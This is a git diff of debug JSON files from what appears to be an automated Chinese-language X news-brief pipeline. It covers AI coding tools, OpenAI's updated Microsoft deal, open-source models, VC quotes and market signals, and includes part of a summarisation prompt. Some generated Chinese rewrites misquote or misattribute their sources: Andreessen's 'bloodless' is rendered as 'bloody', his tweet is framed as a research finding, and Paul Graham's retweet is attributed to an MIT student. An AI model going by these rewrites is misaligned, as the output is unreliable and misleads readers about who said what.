2026-04-27\",\"summary\":\"OpenAI与微软合作升级:微软保持主要云伙伴身份,但OpenAI产品和API现可在所有云上使用\",\"url\":\"https://x.com/sama/status/2048755148361707946\"},{\"id\":\"p04\",\"title\":\"Warp终端正式开源\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor\",\"url\":\"https://x.com/berryxia/status/2049254052840812960\"},{\"id\":\"p05\",\"title\":\"AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录\",\"meta\":\"GoSailGlobal | 2026-04-29\",\"summary\":\"索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍\",\"url\":\"https://x.com/GoSailGlobal/status/2049415194372342164\"},{\"id\":\"p06\",\"title\":\"NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"256K超长上下文,语言+视觉+语音+视频+音频一体化,专为subagents/Agentic任务设计,完全开源(权重+数据+配方)\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"The AI we thought we'd get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.\",\"speaker\":\"Marc Andreessen\",\"date\":\"2026-04-28\",\"note\":\"a16z联合创始人重新定义AI本质:我们得到的是文明知识的镜像而非外星智能\",\"url\":\"https://x.com/pmarca/status/2049193915249574141\"},{\"id\":\"q2\",\"quote\":\"Yes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build something valuable.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-04-29\",\"note\":\"PG对创始人的建议:避开前沿实验室的攻击范围,选择正确细分领域即可\",\"url\":\"https://x.com/paulg/status/2049333482271260710\"},{\"id\":\"q3\",\"quote\":\"GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.\",\"speaker\":\"Cursor\",\"date\":\"2026-04-24\",\"note\":\"GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%\",\"url\":\"https://x.com/cursor_ai/status/2047744579127185843\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI编程工具实测\",\"subtitle\":\"Cursor + Claude Code 工作流\",\"level\":\"P0\",\"items\":[{\"text\":\"Cursor 3.2发布/multitask并行子Agent\",\"url\":\"https://x.com/cursor_ai/status/2047744579127185843\"},{\"text\":\"Claude Blender MCP一句话操控3D场景\",\"url\":\"https://x.com/Pluvio9yte/status/2049403423813140571\"},{\"text\":\"GPT-5.5登顶CursorBench 72.8%\",\"url\":\"https://x.com/cursor_ai/status/2047764651363180839\"}]},{\"id\":\"c2\",\"title\":\"开源模型生态\",\"subtitle\":\"多模态与Agent专用\",\"level\":\"P0\",\"items\":[{\"text\":\"NVIDIA Nemotron 3 Nano Omni开源30B(5模态)\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"},{\"text\":\"前GitHub CTO团队开源Laguna 33B MoE\",\"url\":\"https://x.com/berryxia/status/2049250710492160228\"},{\"text\":\"Moonshot Kimi k2.6成开源SOTA\",\"url\":\"https://x.com/AravSrinivas/status/2047145172337836139\"}]},{\"id\":\"c3\",\"title\":\"国产模型与Token补贴\",\"subtitle\":\"中文开发者福利\",\"level\":\"P1\",\"items\":[{\"text\":\"小米百万亿token补贴到账7亿\",\"url\":\"https://x.com/realNyarime/status/2049296454905393361\"},{\"text\":\"罗福莉团队100T tokens grant开放申请\",\"url\":\"https://x.com/runes_leo/status/2049402305217241384\"}]},{\"id\":\"c4\",\"title\":\"AI编程学习资源\",\"subtitle\":\"Skill框架与实操教程\",\"level\":\"P1\",\"items\":[{\"text\":\"Matt Pocock开源38K stars的Skill框架\",\"url\":\"https://x.com/GoSailGlobal/status/2049339826877665496\"},{\"text\":\"Composio发布awesome-codex-skills即插即用\",\"url\":\"https://x.com/GoSailGlobal/status/2049327853469310984\"}]},{\"id\":\"c5\",\"title\":\"宏观与市场信号\",\"subtitle\":\"能源与房产\",\"level\":\"P2\",\"items\":[{\"text\":\"伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%\",\"url\":\"https://x.com/charliebilello/status/2049298490489004357\"},{\"text\":\"美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%\",\"url\":\"https://x.com/charliebilello/status/2049306480071873011\"}]},{\"id\":\"c6\",\"title\":\"新终端与开发工具\",\"subtitle\":\"Warp开源 + 垂直Tab\",\"level\":\"P1\",\"items\":[{\"text\":\"Warp正式开源,重大转折点\",\"url\":\"https://x.com/dingyi/status/2049304499093946479\"},{\"text\":\"Ghostty离开GitHub,Warp垂直Tab更好用\",\"url\":\"https://x.com/berryxia/status/2049254052840812960\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光\",\"detail\":\"托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Anthropic拒接军方合作,Google签下五角大楼新合同\",\"detail\":\"AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI项目严重长尾:54%项目零star,Top1%占83% stars\",\"detail\":\"开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"VC退出路径收窄:IPO门槛$500M revenue\",\"detail\":\"Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻\"},{\"id\":\"r5\",\"level\":\"MID\",\"title\":\"SBC稀释风险:股价下跌时3%年化稀释可飙至10%\",\"detail\":\"股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险\"},{\"id\":\"r6\",\"level\":\"OPP\",\"title\":\"美国房价将迎来调整\",\"detail\":\"Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行\"}]}", + "parsed_modules": { + "headline": "OpenAI全云部署+Claude/MCP连接器爆发,AI编程工具生态进入\"agent网络\"新时代", + "themes": [ + { + "id": "t1", + "title": "AI 编程工具生态爆发:多连接器 + 多 Agent 协同", + "subtitle": "Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络", + "bullets": [ + "Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日", + "Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium", + "Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars", + "前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行" + ], + "samples": [ + { + "text": "Cursor 3.2支持/multitask并行子Agent,GPT-5.5登顶CursorBench", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "handle": "cursor_ai", + "date": "2026-04-24" + }, + { + "text": "Mozilla any-llm统一接口连接所有LLM provider", + "url": "https://x.com/GoSailGlobal/status/2049327853469310984", + "handle": "GoSailGlobal", + "date": "2026-04-29" + }, + { + "text": "Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架", + "url": "https://x.com/berryxia/status/2049247904536428805", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t2", + "title": "OpenAI全云部署 + 开源模型军备竞赛", + "subtitle": "微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打", + "bullets": [ + "OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用", + "Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态", + "小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好" + ], + "samples": [ + { + "text": "OpenAI全云部署,解除微软绑定", + "url": "https://x.com/sama/status/2048755148361707946", + "handle": "sama", + "date": "2026-04-27" + }, + { + "text": "Perplexity用GPT-5.5编排,Kimi k2.6成开源SOTA", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "handle": "AravSrinivas", + "date": "2026-04-27" + }, + { + "text": "NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用", + "url": "https://x.com/berryxia/status/2049253021159403786", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t3", + "title": "AI投资与生存指南:vc视角的务实判断", + "subtitle": "Paul Graham:避开前沿实验室的\"blast radius\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能", + "bullets": [ + "Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域", + "Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它", + "Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建" + ], + "samples": [ + { + "text": "PG对创始人建议:避开前沿实验室攻击范围", + "url": "https://x.com/paulg/status/2049333482271260710", + "handle": "paulg", + "date": "2026-04-29" + }, + { + "text": "Marc Andreessen:AI是文明知识的镜像", + "url": "https://x.com/pmarca/status/2049193915249574141", + "handle": "pmarca", + "date": "2026-04-28" + }, + { + "text": "Harry Stebbings:裁员不能解决问题,需重建文化和人才", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "handle": "HarryStebbings", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p04", + "title": "Warp终端正式开源", + "meta": "berryxia | 2026-04-28", + "summary": "知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor", + "url": "https://x.com/berryxia/status/2049254052840812960" + }, + { + "id": "p05", + "title": "AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录", + "meta": "GoSailGlobal | 2026-04-29", + "summary": "索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164" + } + ], + "top_quotes": [ + { + "id": "q3", + "quote": "GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.", + "speaker": "Cursor", + "date": "2026-04-24", + "note": "GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%", + "url": "https://x.com/cursor_ai/status/2047744579127185843" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具实测", + "subtitle": "Cursor + Claude Code 工作流", + "level": "P0", + "items": [ + { + "text": "Claude Blender MCP一句话操控3D场景", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571" + } + ] + }, + { + "id": "c2", + "title": "开源模型生态", + "subtitle": "多模态与Agent专用", + "level": "P0", + "items": [ + { + "text": "前GitHub CTO团队开源Laguna 33B MoE", + "url": "https://x.com/berryxia/status/2049250710492160228" + }, + { + "text": "Moonshot Kimi k2.6成开源SOTA", + "url": "https://x.com/AravSrinivas/status/2047145172337836139" + } + ] + }, + { + "id": "c3", + "title": "国产模型与Token补贴", + "subtitle": "中文开发者福利", + "level": "P1", + "items": [ + { + "text": "小米百万亿token补贴到账7亿", + "url": "https://x.com/realNyarime/status/2049296454905393361" + }, + { + "text": "罗福莉团队100T tokens grant开放申请", + "url": "https://x.com/runes_leo/status/2049402305217241384" + } + ] + }, + { + "id": "c4", + "title": "AI编程学习资源", + "subtitle": "Skill框架与实操教程", + "level": "P1", + "items": [ + { + "text": "Matt Pocock开源38K stars的Skill框架", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496" + } + ] + }, + { + "id": "c5", + "title": "宏观与市场信号", + "subtitle": "能源与房产", + "level": "P2", + "items": [ + { + "text": "伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%", + "url": "https://x.com/charliebilello/status/2049298490489004357" + }, + { + "text": "美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%", + "url": "https://x.com/charliebilello/status/2049306480071873011" + } + ] + }, + { + "id": "c6", + "title": "新终端与开发工具", + "subtitle": "Warp开源 + 垂直Tab", + "level": "P1", + "items": [ + { + "text": "Warp正式开源,重大转折点", + "url": "https://x.com/dingyi/status/2049304499093946479" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光", + "detail": "托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic拒接军方合作,Google签下五角大楼新合同", + "detail": "AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI项目严重长尾:54%项目零star,Top1%占83% stars", + "detail": "开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题" + }, + { + "id": "r4", + "level": "MID", + "title": "VC退出路径收窄:IPO门槛$500M revenue", + "detail": "Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻" + }, + { + "id": "r5", + "level": "MID", + "title": "SBC稀释风险:股价下跌时3%年化稀释可飙至10%", + "detail": "股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险" + }, + { + "id": "r6", + "level": "OPP", + "title": "美国房价将迎来调整", + "detail": "Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_171635_l2_input.json b/data/x_brief/debug/20260429_171635_l2_input.json new file mode 100644 index 0000000..5cc3cfd --- /dev/null +++ b/data/x_brief/debug/20260429_171635_l2_input.json @@ -0,0 +1,70 @@ +{ + "target_indexes": [ + 437, + 39, + 88, + 304, + 439, + 82, + 32, + 118, + 67 + ], + "target_count": 9, + "targets": [ + { + "idx": 437, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish." + }, + { + "idx": 39, + "handle": "GoSailGlobal", + "url": "https://x.com/GoSailGlobal/status/2049327853469310984", + "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://agentskillshub.top/skill/mozilla-ai/any-llm/\n\n2️⃣ 🆕 nexu-io/open-design\n⭐ 1120 | +336\nAnthropic Claude Design 的本地化开源复刻,19 个 Skills + 71 个 brand-grade Designs\n🔗 https://github.com/nexu-io/open-design\n🌐 https://agentskillshub.top/skill/nexu-io/open-design/\n\n3️⃣ chainstacklabs/polyclaw\n⭐ 333 | +333\nPolymarket 交易 OpenClaw skill——浏览预测市场 + 执行交易 + 跟踪持仓\n🔗 https://github.com/chainstacklabs/polyclaw\n🌐 https://agentskillshub.top/skill/chainstacklabs/polyclaw/\n\n4️⃣ mkurman/zorai\n⭐ 294 | +294\n持久化、多 agent、可审计的学习型执行平台,daemon 守护 agent 协作\n🔗 https://github.com/mkurman/zorai\n🌐 https://agentskillshub.top/skill/mkurman/zorai/\n\n5️⃣ mcpware/cross-code-organizer\n⭐ 283 | +283\n跨 harness 的配置 dashboard——同时管 Claude Code/Codex/Cursor/Cline 配置\n🔗 https://github.com/mcpware/cross-code-organizer\n🌐 https://agentskillshub.top/skill/mcpware/cross-code-organizer/\n\n6️⃣ witchan/ios-mcp\n⭐ 217 | +217\niOS MCP for 越狱 iPhone——给开发者和 AI agent 的 iOS 设备管理\n🔗 https://github.com/witchan/ios-mcp\n🌐 https://agentskillshub.top/skill/witchan/ios-mcp/\n\n7️⃣ zhitongblog/solomd\n⭐ 193 | +193\nMarkdown editor + 内置 MCP server,本地优先,MIT,~15 MB\n🔗 https://github.com/zhitongblog/solomd\n🌐 https://agentskillshub.top/skill/zhitongblog/solomd/\n\n8️⃣ ghbalf/freecad-ai\n⭐ 167 | +167\nFreeCAD 的 AI workbench——自然语言生成 3D 模型\n🔗 https://github.com/ghbalf/freecad-ai\n🌐 https://agentskillshub.top/skill/ghbalf/freecad-ai/\n\n9️⃣ MinishLab/semble\n⭐ 112 | +86\n专为 Agent 设计的快速准确代码搜索引擎\n🔗 https://github.com/MinishLab/semble\n🌐 https://agentskillshub.top/skill/MinishLab/semble/\n\n🔟 🆕 trapoom555/claude-paperloom\n⭐ 47 | +4\nClaude Code 自维护学术知识图谱插件,对接 Obsidian\n🔗 https://github.com/trapoom555/claude-paperloom\n🌐 https://agentskillshub.top/skill/trapoom555/claude-paperloom/\n\n🎯 今日趋势:生态边界拓宽 — Mozilla(统一接口)/ Polymarket(金融预测)/ FreeCAD(3D 建模)/ iOS(移动越狱)/ Markdown 编辑器 / 学术知识图谱,全部有人在做 skill/MCP 接入 🔍" + }, + { + "idx": 88, + "handle": "berryxia", + "url": "https://x.com/berryxia/status/2049247904536428805", + "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加入 Blender Development Fund,支持开源 3D 软件发展\n\n创意工作者和 3D/设计/音乐/视频玩家,这波更新太香了!" + }, + { + "idx": 304, + "handle": "sama", + "url": "https://x.com/sama/status/2048755148361707946", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030." + }, + { + "idx": 439, + "handle": "AravSrinivas", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!" + }, + { + "idx": 82, + "handle": "berryxia", + "url": "https://x.com/berryxia/status/2049253021159403786", + "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。" + }, + { + "idx": 32, + "handle": "paulg", + "url": "https://x.com/paulg/status/2049333482271260710", + "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build amazing startups:\n\nOpenAI is not going to build a cattle-herding drone, buy an old F-150 and drive from ranch to ranch like the founder of one of the fastest-growing YC W26 startups, Graze Mate.\n\nAnthropic is not going to integrate with dental insurance verification systems (Lance).\n\nGoogle is not going to navigate NATO procurement (Milliray).\n\nThe value is in the last mile, not the model. Sales cycles require humans who understand the customer. And most importantly, the market is expanding, not shrinking: AI isn't cannibalizing the existing 1% software spend — it's unlocking the other 5-6% that was going to humans. That's a much bigger market for startups yet-to-be-founded than the one the labs are playing in.\n\nNow, what DOES seem risky?\n\nA thin UI layer on top of ChatGPT with no domain expertise; a general-purpose chatbot or assistant; or a product that gets obsolete when model capabilities improve.\n\nBut — tools for specific industries; \"full-stack\" AI companies that actually are the service (AI law firm, AI accounting firm, AI uranium exploration company); or generally products where the customer doesn't want a tool but an outcome — are defensible ideas for startups." + }, + { + "idx": 118, + "handle": "pmarca", + "url": "https://x.com/pmarca/status/2049193915249574141", + "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply." + }, + { + "idx": 67, + "handle": "HarryStebbings", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_171635_l2_output.json b/data/x_brief/debug/20260429_171635_l2_output.json new file mode 100644 index 0000000..01e0a8a --- /dev/null +++ b/data/x_brief/debug/20260429_171635_l2_output.json @@ -0,0 +1,24 @@ +{ + "target_indexes": [ + 437, + 39, + 88, + 304, + 439, + 82, + 32, + 118, + 67 + ], + "broadcast_zh": [ + "Cursor 3更新支持多任务处理功能,通过并行分发异步子代理提升请求处理效率,用户无需等待当前任务完成即可并发执行已排队消息。", + "Mozilla AI今日发布统一LLM通信接口any-llm,结合跨领域MCP生态扩张及超6.7万AI代理工具库的持续更新,推动开放模型应用边界进一步扩展。", + "Anthropic推出Claude与Blender、Autodesk Fusion等创意工具深度整合,实现3D场景调试、模型修改及建模工具自定义开发,同时加入Blender开发基金支持开源生态,为数字内容创作者优化跨平台工作流。", + "人工智能公司宣布更新与微软的云计算合作,微软将维持主要合作伙伴地位,同时产品和服务可在多云平台部署,双方已达成延至2032年的模型供应协议及2030年收入分成安排。", + "Perplexity Computer启动GPT-5.5默认协调模型部署,逐步替代原有Opus 4.7版本,并将持续监测用户反馈与系统表现。", + "NVIDIA推出Nemotron 3 Nano Omni多模态开源模型,集成语言、视觉、语音等五种模态处理能力,参数达300亿,支持超长上下文(256,000字),专为代理系统设计,权重、数据及训练方案全开源,并通过NIM API提供免费试用。", + "MIT学生指出,尽管OpenAI等科技巨头AI研发进展迅猛,但其在垂直领域应用仍存在局限,初创企业通过深耕细分市场与客户关系,可在AI发展过程中找到独特增长空间。", + "\"研究发现,AI发展已超越冰冷机器范畴,成为人类文明知识与文化的镜像,引发深度情感认同。\"", + "专家指出,单纯裁员难以解决企业架构臃肿问题,核心症结在于文化和人才质量,全面重组尤具挑战,上市公司尤甚。" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_185943_l1_stage1_input.txt b/data/x_brief/debug/20260429_185943_l1_stage1_input.txt new file mode 100644 index 0000000..d88fb6a --- /dev/null +++ b/data/x_brief/debug/20260429_185943_l1_stage1_input.txt @@ -0,0 +1,462 @@ +[meta] + +tweets=120 + +tweet_summary_chars=113480 + +phase=stage1_draft + + + +[prompt] + +你是“X资讯月报总编”。请先产出“结构草案 JSON”(阶段1),供后续阶段2定稿使用。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +阶段1输出要求(仅草案): +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 使用如下字段(严格保持键名): +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"sample_urls":["..."]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","item_urls":["..."],"item_texts":["..."]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) trending_keywords:3-6 个当期最热词条(中英均可),直接从推文内容提炼。 +5) themes 的 priority 字段:首个主题通常为 P0,其余为 P1/P2;根据重要性自判。 +6) 每个模块优先包含可验证 URL;无法确定时宁缺毋滥。 +7) 内容必须中文,简洁可执行。 +8) JSON 必须合法:双引号、无注释、无尾逗号。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-29(新增 Cursor 官方账号 + 17位中文区博主;华语圈从3人扩充至20人) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @cursor_ai | Cursor | 中 | 产品更新、功能发布、Cursor生态 | 新增;AI编程工具官方账号,主线之一 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉 | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容 | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ✅ 以下所有账号均为英文 handle,Nitter RSS 和 xint 均可正常抓取,无需 X API 补充。 +> ⚠️ 例外:@二级炒家 仍为中文 handle,需走 X API 通道。 + +#### 华语圈 · AI 编程 / 工具(与用户核心兴趣高度重叠) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 质量高,思考密度接近英文圈顶级账号 | +| @bozhou_ai | 泊舟 | 高 | 智能体构建、提示词、AI编程实践 | 新增;AI程序员+氛围编程践行者,2.1万粉,内容实操性强 | +| @lxfater | 铁锤人 | 高 | AI工具、开源项目、创业实践 | 新增;GitHub 